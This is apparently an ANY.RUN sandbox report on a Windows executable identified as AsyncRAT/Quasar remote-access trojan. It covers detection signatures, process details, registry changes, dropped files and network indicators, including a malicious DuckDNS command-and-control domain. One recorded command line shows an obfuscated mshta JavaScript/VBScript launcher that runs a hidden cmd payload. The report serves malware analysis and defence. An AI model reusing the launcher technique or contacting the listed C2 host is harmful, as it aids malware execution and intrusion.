File name: 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe

Full analysis: https://app.any.run/tasks/3879d3ea-3c66-4b9d-9c38-cbd593cbf83f
Verdict: Malicious activity
Threats:

AsyncRAT is a remote access trojan (RAT) that can monitor and remotely control infected systems. It was published on GitHub as legitimate open-source remote administration software, but attackers use it for its many malicious capabilities.

Analysis date: March 09, 2024, 10:52:58
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: rat, asyncrat, remote, quasar
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (GUI) x86-64, for MS Windows
MD5: 8338BBDD6AB3AD35C0FBFBEBE29813FE
SHA1: 39F017290209564E34EB7AEC80EB2A91A2F5D2D5
SHA256: 9BF5171DD1229EE3E488E3FD3D2A067A85E227D0ED54E1ED18BBC35A89F698B7
SSDEEP: 98304:ln2ocmU5GYnyNl8YqjV8pJWm6qK8C237bzg0ICYlngn81ISeo/yn8OJdx4tGHRyG:Y+XqDuo/Num/bXZ90U9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
      • powershell.exe (PID: 1996)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3004)
      • cmd.exe (PID: 616)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3220)
      • powershell.exe (PID: 1996)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3220)
      • powershell.exe (PID: 1996)
    • Known privilege escalation attack

      • dllhost.exe (PID: 4200)
    • Actions look like stealing of personal data

      • svchost.exe (PID: 1760)
    • Application was injected by another process

      • lsass.exe (PID: 764)
      • svchost.exe (PID: 1180)
      • svchost.exe (PID: 452)
      • svchost.exe (PID: 588)
      • svchost.exe (PID: 1092)
      • svchost.exe (PID: 1236)
      • svchost.exe (PID: 1968)
      • svchost.exe (PID: 1448)
      • svchost.exe (PID: 1388)
      • svchost.exe (PID: 1888)
      • svchost.exe (PID: 1500)
      • svchost.exe (PID: 1640)
      • svchost.exe (PID: 1508)
      • svchost.exe (PID: 1776)
      • svchost.exe (PID: 1760)
      • svchost.exe (PID: 1768)
      • svchost.exe (PID: 1880)
      • svchost.exe (PID: 2120)
      • svchost.exe (PID: 1956)
      • svchost.exe (PID: 1656)
      • svchost.exe (PID: 1248)
      • svchost.exe (PID: 1320)
      • svchost.exe (PID: 1328)
      • svchost.exe (PID: 2456)
      • svchost.exe (PID: 2448)
      • spoolsv.exe (PID: 2692)
      • svchost.exe (PID: 2648)
      • svchost.exe (PID: 2508)
      • svchost.exe (PID: 2884)
      • dasHost.exe (PID: 2900)
      • svchost.exe (PID: 2320)
      • svchost.exe (PID: 2208)
      • svchost.exe (PID: 2216)
      • svchost.exe (PID: 2284)
      • svchost.exe (PID: 2360)
      • svchost.exe (PID: 2464)
      • svchost.exe (PID: 3068)
      • svchost.exe (PID: 3320)
      • svchost.exe (PID: 3292)
      • svchost.exe (PID: 3256)
      • svchost.exe (PID: 2432)
      • svchost.exe (PID: 3624)
      • svchost.exe (PID: 3308)
      • svchost.exe (PID: 3148)
      • svchost.exe (PID: 3580)
      • svchost.exe (PID: 2392)
      • svchost.exe (PID: 3104)
      • OfficeClickToRun.exe (PID: 3084)
      • svchost.exe (PID: 3652)
      • explorer.exe (PID: 4848)
      • svchost.exe (PID: 4864)
      • svchost.exe (PID: 5096)
      • dllhost.exe (PID: 5500)
      • ApplicationFrameHost.exe (PID: 6612)
      • dllhost.exe (PID: 5416)
      • svchost.exe (PID: 712)
      • svchost.exe (PID: 6808)
      • MoUsoCoreWorker.exe (PID: 6876)
      • svchost.exe (PID: 8)
      • svchost.exe (PID: 3696)
      • svchost.exe (PID: 4228)
      • svchost.exe (PID: 4456)
      • svchost.exe (PID: 4604)
      • svchost.exe (PID: 4488)
      • ctfmon.exe (PID: 4680)
      • svchost.exe (PID: 4612)
      • dllhost.exe (PID: 6084)
      • SppExtComObj.Exe (PID: 1524)
      • svchost.exe (PID: 7020)
      • svchost.exe (PID: 892)
      • svchost.exe (PID: 6964)
      • svchost.exe (PID: 6692)
      • slui.exe (PID: 5224)
      • slui.exe (PID: 5492)
      • WmiPrvSE.exe (PID: 4412)
      • WaaSMedicAgent.exe (PID: 2936)
      • svchost.exe (PID: 680)
      • svchost.exe (PID: 7004)
      • UserOOBEBroker.exe (PID: 7064)
      • svchost.exe (PID: 7156)
      • svchost.exe (PID: 4888)
      • svchost.exe (PID: 6252)
      • slui.exe (PID: 944)
      • svchost.exe (PID: 7552)
      • svchost.exe (PID: 7584)
    • Runs injected code in another process

      • $sxr-powershell.exe (PID: 3220)
    • Starts PowerShell from an unusual location

      • $sxr-cmd.exe (PID: 2428)
      • $sxr-cmd.exe (PID: 5788)
    • ASYNCRAT has been detected (SURICATA)

      • $sxr-powershell.exe (PID: 3220)
    • QUASAR has been detected (SURICATA)

      • $sxr-powershell.exe (PID: 3220)
    • QUASAR has been detected (YARA)

      • $sxr-powershell.exe (PID: 3220)
  • SUSPICIOUS

    • Starts a Microsoft application from an unusual location

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
    • Process drops legitimate windows executable

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
      • powershell.exe (PID: 1996)
    • Starts CMD.EXE for command execution

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
      • cmd.exe (PID: 3004)
      • dllhost.exe (PID: 4200)
      • cmd.exe (PID: 616)
      • $sxr-cmd.exe (PID: 2428)
      • $sxr-cmd.exe (PID: 5788)
    • Application launched itself

      • cmd.exe (PID: 3004)
      • cmd.exe (PID: 616)
    • Starts POWERSHELL.EXE for command execution

      • cmd.exe (PID: 3004)
      • cmd.exe (PID: 616)
    • Executing commands from a ".bat" file

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
      • dllhost.exe (PID: 4200)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3004)
      • cmd.exe (PID: 616)
    • The process creates files with name similar to system file names

      • powershell.exe (PID: 1996)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1996)
    • The process executes via Task Scheduler

      • $sxr-mshta.exe (PID: 456)
    • Reads security settings of Internet Explorer

      • $sxr-mshta.exe (PID: 456)
      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)
    • Reads Microsoft Outlook installation path

      • $sxr-mshta.exe (PID: 456)
    • Reads Internet Explorer settings

      • $sxr-mshta.exe (PID: 456)
    • Reads the date of Windows installation

      • $sxr-mshta.exe (PID: 456)
    • Starts itself from another location

      • $sxr-cmd.exe (PID: 2428)
      • $sxr-cmd.exe (PID: 5788)
    • Detected use of alternative data streams (AltDS)

      • svchost.exe (PID: 1760)
    • Creates file in the systems drive root

      • explorer.exe (PID: 4848)
    • Checks Windows Trust Settings

      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)
    • Cryptography encrypted command line is found

      • $sxr-cmd.exe (PID: 5788)
    • Hides command output

      • $sxr-cmd.exe (PID: 5788)
    • Gets information on the list of running processes

      • $sxr-powershell.exe (PID: 3220)
    • The process checks if it is being run in a virtual environment

      • WmiPrvSE.exe (PID: 4412)
    • Adds/modifies Windows certificates

      • lsass.exe (PID: 764)
    • Connects to unusual port

      • $sxr-powershell.exe (PID: 3220)
  • INFO

    • Checks supported languages

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
      • $sxr-mshta.exe (PID: 456)
      • $sxr-cmd.exe (PID: 2428)
      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)
      • $sxr-cmd.exe (PID: 5788)
    • Creates files in a temporary directory

      • 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe (PID: 6512)
      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)
    • Reads the software policy settings

      • lsass.exe (PID: 764)
      • WaaSMedicAgent.exe (PID: 2936)
      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)
      • slui.exe (PID: 5492)
      • slui.exe (PID: 7244)
    • Reads the time zone

      • WmiPrvSE.exe (PID: 4412)
    • Checks transactions between databases Windows and Oracle

      • powershell.exe (PID: 3220)
    • Creates files in the program directory

      • powershell.exe (PID: 3220)
      • MoUsoCoreWorker.exe (PID: 6876)
    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 4200)
    • Reads Microsoft Office registry keys

      • OfficeClickToRun.exe (PID: 3084)
    • Process checks Internet Explorer phishing filters

      • $sxr-mshta.exe (PID: 456)
    • Reads the computer name

      • $sxr-mshta.exe (PID: 456)
      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)
      • $sxr-cmd.exe (PID: 5788)
      • $sxr-cmd.exe (PID: 2428)
    • Reads Environment values

      • $sxr-mshta.exe (PID: 456)
      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)
    • Creates a writable file in the system directory

      • svchost.exe (PID: 1236)
    • Process checks computer location settings

      • $sxr-mshta.exe (PID: 456)
    • Reads the machine GUID from the registry

      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)
    • Process checks Powershell version

      • $sxr-powershell.exe (PID: 3220)
      • $sxr-powershell.exe (PID: 5636)
    • Reads Windows Product ID

      • WmiPrvSE.exe (PID: 4412)
    • Checks proxy server information

      • slui.exe (PID: 7244)
      • $sxr-powershell.exe (PID: 3220)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 1980:11:30 13:15:57+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.13
CodeSize: 29696
InitializedDataSize: 11337216
UninitializedDataSize: -
EntryPoint: 0x79b0
OSVersion: 10
ImageVersion: 10
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 11.0.17763.1
ProductVersionNumber: 11.0.17763.1
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Win32 Cabinet Self-Extractor
FileVersion: 11.00.17763.1 (WinBuild.160101.0800)
InternalName: Wextract
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: WEXTRACT.EXE .MUI
ProductName: Internet Explorer
ProductVersion: 11.00.17763.1
No data.
All screenshots are available in the full report
Total processes: 150
Monitored processes: 104
Malicious processes: 15
Suspicious processes: 81

Behavior graph

[Interactive process graph; available in the full report.] Graph nodes: start, 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe, cmd.exe, conhost.exe, powershell.exe, wmiprvse.exe CMSTPLUA, waasmedicagent.exe, svchost.exe (many instances), $sxr-mshta.exe, $sxr-cmd.exe, $sxr-powershell.exe (tagged #ASYNCRAT), slui.exe, lsass.exe, sppextcomobj.exe, spoolsv.exe, dashost.exe, officeclicktorun.exe, ctfmon.exe, explorer.exe, dllhost.exe, applicationframehost.exe, mousocoreworker.exe, useroobebroker.exe.

Process information

PID: 8
CMD: C:\WINDOWS\System32\svchost.exe -k LocalService -p -s LicenseManager
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
LOCAL SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
PID: 452
CMD: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p -s LSM
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\lsm.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
PID: 456
CMD: C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bdwagIZyqMKABtRmRUfx4312:nXuWlSGO=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
Path: C:\Windows\$sxr-mshta.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\$sxr-mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wldp.dll
c:\windows\system32\mshtml.dll
PID: 588
CMD: C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s gpsvc
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
PID: 616
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\IXP000.TMP\Update.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: dllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 680
CMD: C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
PID: 712
CMD: C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Appinfo
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
PID: 764
CMD: C:\WINDOWS\system32\lsass.exe
Path: C:\Windows\System32\lsass.exe
Parent process: wininit.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Local Security Authority Process
Exit code:
0
Version:
10.0.19041.1266 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\lsass.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\lsasrv.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\sechost.dll
PID: 892
CMD: C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s wlidsvc
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
PID: 944
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
Total events: 53 807
Read events: 53 268
Write events: 333
Delete events: 206

Modification events

(PID) Process: (892) svchost.exe
Key: HKEY_USERS\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties
Operation: write
Name: LID
Value: 0018000E203D7567

(PID) Process: (892) svchost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL
Operation: delete value
Name: ClockSkew
Value: -

(PID) Process: (892) svchost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
Operation: write
Name: ClockTimeSeconds
Value: 973FEC6500000000

(PID) Process: (892) svchost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
Operation: write
Name: TickCount
Value: 7F820D0000000000

(PID) Process: (3308) svchost.exe
Key: HKEY_USERS\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property
Operation: write
Name: 0018000E203D7567
Value: -

(PID) Process: (3308) svchost.exe
Key: HKEY_USERS\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{D80D1001-5B38-49E9-9D34-EC9B84779189}
Operation: write
Name: DeviceTicket
Value: -

(PID) Process: (3308) svchost.exe
Key: HKEY_USERS\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{D80D1001-5B38-49E9-9D34-EC9B84779189}
Operation: write
Name: DeviceId
Value: 0018000E203D7567

(PID) Process: (3308) svchost.exe
Key: HKEY_USERS\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{D80D1001-5B38-49E9-9D34-EC9B84779189}
Operation: write
Name: ApplicationFlags
Value: 1

(PID) Process: (3220) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

(PID) Process: (3220) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1
Executable files: 3
Suspicious files: 9
Text files: 13
Unknown types: 21

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
6512 | 9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe | C:\Users\admin\AppData\Local\Temp\IXP000.TMP\Update.bat | - | - | -
1760 | svchost.exe | C:\Windows\Prefetch\HOST.EXE-F5D74C61.pf | binary | D750ACA5D7942A7D0D48B3D62F2B31B7 | 64FC9AB111C22D7F2394408CBB352E37AA2E466A6E3AA64AA29ADCF39B76A241
3220 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0bdb2ils.b4z.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1760 | svchost.exe | C:\Windows\Prefetch\9BF5171DD1229EE3E488E3FD3D2A0-1DE6EB01.pf | binary | F16E7DEAD53F4E2E853620DCBEE8F484 | 24A0D9DB8923F881DF7CB7A9723C75EAA4D395557B9CC4D315810CC6EC179C89
1236 | svchost.exe | C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | xml | DF4D2EF797D720ADB05E5EE9A7C4E192 | CEDED5FD52F34235181673DC1E3825AF93F953DA02704E1596971027C0CF45C3
1996 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dw4snynn.ome.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6876 | MoUsoCoreWorker.exe | C:\ProgramData\USOPrivate\UpdateStore\store.db-journal | binary | 7F60EBF595D569BE65D626D7BDFFEEE8 | A523752CCF49FBBB0EC9F95FB751E6927CDD81DAC608784C079395F63875BC8C
1996 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hhafeyt4.zkt.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3220 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ug2pggxi.q42.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1760 | svchost.exe | C:\Windows\Prefetch\SLUI.EXE-724E99D9.pf | binary | 47AF975C78F7D96FE74BC32C8A21AF74 | CA21D3C07D71DC923C5CB0B4B4C831805677C615EBD400B095BEAD3893DCB834
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 12
TCP/UDP connections: 41
DNS requests: 15
Threats: 5

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
6692 | svchost.exe | POST | 302 | 23.218.210.69:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | - | - | unknown
6692 | svchost.exe | POST | - | 138.91.171.81:80 | http://dmd.metaservices.microsoft.com/metadata.svc | unknown | - | - | unknown
6692 | svchost.exe | POST | 302 | 23.218.210.69:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | - | - | unknown
6692 | svchost.exe | POST | - | 138.91.171.81:80 | http://dmd.metaservices.microsoft.com/metadata.svc | unknown | - | - | unknown
6692 | svchost.exe | POST | 302 | 23.218.210.69:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | - | - | unknown
6692 | svchost.exe | POST | - | 138.91.171.81:80 | http://dmd.metaservices.microsoft.com/metadata.svc | unknown | - | - | unknown
6692 | svchost.exe | POST | 302 | 23.218.210.69:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | - | - | unknown
6692 | svchost.exe | POST | 302 | 23.218.210.69:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | - | - | unknown
6692 | svchost.exe | POST | 302 | 23.218.210.69:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | - | - | unknown
6692 | svchost.exe | POST | 502 | 20.231.121.79:80 | http://dmd.metaservices.microsoft.com/metadata.svc | unknown | html | 183 b | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 40.115.3.253:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown
3624 | svchost.exe | 239.255.255.250:1900 | - | - | - | unknown
6876 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
892 | svchost.exe | 40.126.32.74:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3308 | svchost.exe | 40.113.110.67:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
892 | svchost.exe | 40.126.32.133:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown
4432 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6288 | backgroundTaskHost.exe | 104.126.37.176:443 | www.bing.com | Akamai International B.V. | DE | unknown

DNS requests

Domain | IP | Reputation
client.wns.windows.com | 40.113.110.67 | whitelisted
settings-win.data.microsoft.com | 20.73.194.208 | whitelisted
www.bing.com | 104.126.37.176, 104.126.37.155, 104.126.37.177, 104.126.37.137, 104.126.37.178, 104.126.37.139, 104.126.37.136, 104.126.37.170, 104.126.37.160 | whitelisted
arc.msn.com | 20.199.58.43 | whitelisted
go.microsoft.com | 23.218.210.69 | whitelisted
dmd.metaservices.microsoft.com | 138.91.171.81, 52.142.223.178, 20.231.121.79 | whitelisted
fe3cr.delivery.mp.microsoft.com | 20.242.39.171 | whitelisted
slscr.update.microsoft.com | 40.68.123.157 | whitelisted
kinggru.duckdns.org | 94.156.71.237 | malicious
ipwho.is | 195.201.57.90 | malicious

Threats

PID | Process | Class | Message
2216 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
2216 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3220 | $sxr-powershell.exe | Domain Observed Used for C2 Detected | ET MALWARE Generic AsyncRAT Style SSL Cert
2216 | svchost.exe | Potentially Bad Traffic | ET INFO External IP Lookup Domain in DNS Lookup (ipwho .is)
3220 | $sxr-powershell.exe | Malware Command and Control Activity Detected | REMOTE [ANY.RUN] QuasarRAT Successful Connection (GCM_SHA384)
No debug info